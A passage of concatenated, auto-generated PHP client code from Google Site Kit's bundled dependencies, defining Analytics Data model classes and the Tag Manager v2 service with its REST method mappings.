the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Filter extends \Google\Site_Kit_Dependencies\Google\Model { protected $betweenFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BetweenFilter::class; protected $betweenFilterDataType = ''; protected $emptyFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\EmptyFilter::class; protected $emptyFilterDataType = ''; /** * @var string */ public $fieldName; protected $inListFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\InListFilter::class; protected $inListFilterDataType = ''; protected $numericFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericFilter::class; protected $numericFilterDataType = ''; protected $stringFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\StringFilter::class; protected $stringFilterDataType = ''; /** * @param BetweenFilter */ public function setBetweenFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BetweenFilter $betweenFilter) { $this->betweenFilter = $betweenFilter; } /** * @return BetweenFilter */ public function getBetweenFilter() { return $this->betweenFilter; } /** * @param EmptyFilter */ public function setEmptyFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\EmptyFilter $emptyFilter) { $this->emptyFilter = $emptyFilter; } /** * @return EmptyFilter */ public function getEmptyFilter() { return $this->emptyFilter; } /** * @param string */ public function setFieldName($fieldName) { $this->fieldName = $fieldName; } /** * @return string */ public function getFieldName() { return $this->fieldName; } /** * @param InListFilter */ public function setInListFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\InListFilter $inListFilter) { $this->inListFilter = $inListFilter; } /** * @return InListFilter */ public function getInListFilter() { return $this->inListFilter; } /** * @param NumericFilter */ public function setNumericFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\NumericFilter $numericFilter) { $this->numericFilter = $numericFilter; } /** * @return NumericFilter */ public function getNumericFilter() { return $this->numericFilter; } /** * @param StringFilter */ public function setStringFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\StringFilter $stringFilter) { $this->stringFilter = $stringFilter; } /** * @return StringFilter */ public function getStringFilter() { return $this->stringFilter; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Filter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Filter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class DimensionValue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $value; /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionValue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_DimensionValue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class SchemaRestrictionResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'activeMetricRestrictions'; protected $activeMetricRestrictionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ActiveMetricRestriction::class; protected $activeMetricRestrictionsDataType = 'array'; /** * @param ActiveMetricRestriction[] */ public function setActiveMetricRestrictions($activeMetricRestrictions) { $this->activeMetricRestrictions = $activeMetricRestrictions; } /** * @return ActiveMetricRestriction[] */ public function getActiveMetricRestrictions() { return $this->activeMetricRestrictions; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\SchemaRestrictionResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_SchemaRestrictionResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for TagManager (v2). * * <p> * This API allows clients to access and modify container and tag configuration.</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/tag-manager" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class TagManager extends \Google\Site_Kit_Dependencies\Google\Service { /** Delete your Google Tag Manager containers. */ const TAGMANAGER_DELETE_CONTAINERS = "https://www.googleapis.com/auth/tagmanager.delete.containers"; /** Manage your Google Tag Manager container and its subcomponents, excluding versioning and publishing. */ const TAGMANAGER_EDIT_CONTAINERS = "https://www.googleapis.com/auth/tagmanager.edit.containers"; /** Manage your Google Tag Manager container versions. */ const TAGMANAGER_EDIT_CONTAINERVERSIONS = "https://www.googleapis.com/auth/tagmanager.edit.containerversions"; /** View and manage your Google Tag Manager accounts. */ const TAGMANAGER_MANAGE_ACCOUNTS = "https://www.googleapis.com/auth/tagmanager.manage.accounts"; /** Manage user permissions of your Google Tag Manager account and container. */ const TAGMANAGER_MANAGE_USERS = "https://www.googleapis.com/auth/tagmanager.manage.users"; /** Publish your Google Tag Manager container versions. */ const TAGMANAGER_PUBLISH = "https://www.googleapis.com/auth/tagmanager.publish"; /** View your Google Tag Manager container and its subcomponents. */ const TAGMANAGER_READONLY = "https://www.googleapis.com/auth/tagmanager.readonly"; public $accounts; public $accounts_containers; public $accounts_containers_destinations; public $accounts_containers_environments; public $accounts_containers_version_headers; public $accounts_containers_versions; public $accounts_containers_workspaces; public $accounts_containers_workspaces_built_in_variables; public $accounts_containers_workspaces_clients; public $accounts_containers_workspaces_folders; public $accounts_containers_workspaces_gtag_config; public $accounts_containers_workspaces_tags; public $accounts_containers_workspaces_templates; public $accounts_containers_workspaces_transformations; public $accounts_containers_workspaces_triggers; public $accounts_containers_workspaces_variables; public $accounts_containers_workspaces_zones; public $accounts_user_permissions; public $rootUrlTemplate; /** * Constructs the internal representation of the TagManager service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://tagmanager.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://tagmanager.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v2'; $this->serviceName = 'tagmanager'; $this->accounts = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\Accounts($this, $this->serviceName, 'accounts', ['methods' => ['get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/accounts', 'httpMethod' => 'GET', 'parameters' => ['includeGoogleTags' => ['location' => 'query', 'type' => 'boolean'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainers($this, $this->serviceName, 'containers', ['methods' => ['combine' => ['path' => 'tagmanager/v2/{+path}:combine', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'allowUserPermissionFeatureUpdate' => ['location' => 'query', 'type' => 'boolean'], 'containerId' => ['location' => 'query', 'type' => 'string'], 'settingSource' => ['location' => 'query', 'type' => 'string']]], 'create' => ['path' => 'tagmanager/v2/{+parent}/containers', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/containers', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'lookup' => ['path' => 'tagmanager/v2/accounts/containers:lookup', 'httpMethod' => 'GET', 'parameters' => ['destinationId' => ['location' => 'query', 'type' => 'string']]], 'move_tag_id' => ['path' => 'tagmanager/v2/{+path}:move_tag_id', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'allowUserPermissionFeatureUpdate' => ['location' => 'query', 'type' => 'boolean'], 'copySettings' => ['location' => 'query', 'type' => 'boolean'], 'copyTermsOfService' => ['location' => 'query', 'type' => 'boolean'], 'copyUsers' => ['location' => 'query', 'type' => 'boolean'], 'tagId' => ['location' => 'query', 'type' => 'string'], 'tagName' => ['location' => 'query', 'type' => 'string']]], 'snippet' => ['path' => 'tagmanager/v2/{+path}:snippet', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_destinations = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersDestinations($this, $this->serviceName, 'destinations', ['methods' => ['get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'link' => ['path' => 'tagmanager/v2/{+parent}/destinations:link', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'allowUserPermissionFeatureUpdate' => ['location' => 'query', 'type' => 'boolean'], 'destinationId' => ['location' => 'query', 'type' => 'string']]], 'list' => ['path' => 'tagmanager/v2/{+parent}/destinations', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->accounts_containers_environments = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersEnvironments($this, $this->serviceName, 'environments', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/environments', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/environments', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'reauthorize' => ['path' => 'tagmanager/v2/{+path}:reauthorize', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_version_headers = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersVersionHeaders($this, $this->serviceName, 'version_headers', ['methods' => ['latest' => ['path' => 'tagmanager/v2/{+parent}/version_headers:latest', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/version_headers', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'includeDeleted' => ['location' => 'query', 'type' => 'boolean'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_versions = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersVersions($this, $this->serviceName, 'versions', ['methods' => ['delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'containerVersionId' => ['location' => 'query', 'type' => 'string']]], 'live' => ['path' => 'tagmanager/v2/{+parent}/versions:live', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'publish' => ['path' => 'tagmanager/v2/{+path}:publish', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'set_latest' => ['path' => 'tagmanager/v2/{+path}:set_latest', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'undelete' => ['path' => 'tagmanager/v2/{+path}:undelete', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspaces($this, $this->serviceName, 'workspaces', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/workspaces', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'create_version' => ['path' => 'tagmanager/v2/{+path}:create_version', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getStatus' => ['path' => 'tagmanager/v2/{+path}/status', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/workspaces', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'quick_preview' => ['path' => 'tagmanager/v2/{+path}:quick_preview', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'resolve_conflict' => ['path' => 'tagmanager/v2/{+path}:resolve_conflict', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'sync' => ['path' => 'tagmanager/v2/{+path}:sync', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_built_in_variables = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesBuiltInVariables($this, $this->serviceName, 'built_in_variables', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/built_in_variables', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'type' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'type' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/built_in_variables', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}/built_in_variables:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'type' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_clients = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesClients($this, $this->serviceName, 'clients', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/clients', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/clients', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_folders = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesFolders($this, $this->serviceName, 'folders', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/folders', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'entities' => ['path' => 'tagmanager/v2/{+path}:entities', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/folders', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'move_entities_to_folder' => ['path' => 'tagmanager/v2/{+path}:move_entities_to_folder', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'tagId' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'triggerId' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'variableId' => ['location' => 'query', 'type' => 'string', 'repeated' => \true]]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_gtag_config = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesGtagConfig($this, $this->serviceName, 'gtag_config', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/gtag_config', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/gtag_config', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_tags = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTags($this, $this->serviceName, 'tags', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/tags', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/tags', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_templates = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTemplates($this, $this->serviceName, 'templates', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/templates', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/templates', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_transformations = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTransformations($this, $this->serviceName, 'transformations', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/transformations', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/transformations', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_triggers = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesTriggers($this, $this->serviceName, 'triggers', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/triggers', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/triggers', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_variables = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesVariables($this, $this->serviceName, 'variables', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/variables', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'tagmanager/v2/{+parent}/variables', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'revert' => ['path' => 'tagmanager/v2/{+path}:revert', 'httpMethod' => 'POST', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]], 'update' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'PUT', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'fingerprint' => ['location' => 'query', 'type' => 'string']]]]]); $this->accounts_containers_workspaces_zones = new \Google\Site_Kit_Dependencies\Google\Service\TagManager\Resource\AccountsContainersWorkspacesZones($this, $this->serviceName, 'zones', ['methods' => ['create' => ['path' => 'tagmanager/v2/{+parent}/zones', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'DELETE', 'parameters' => ['path' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'tagmanager/v2/{+path}', 'httpMethod' => 'GET', 'parameters' => ['path' => 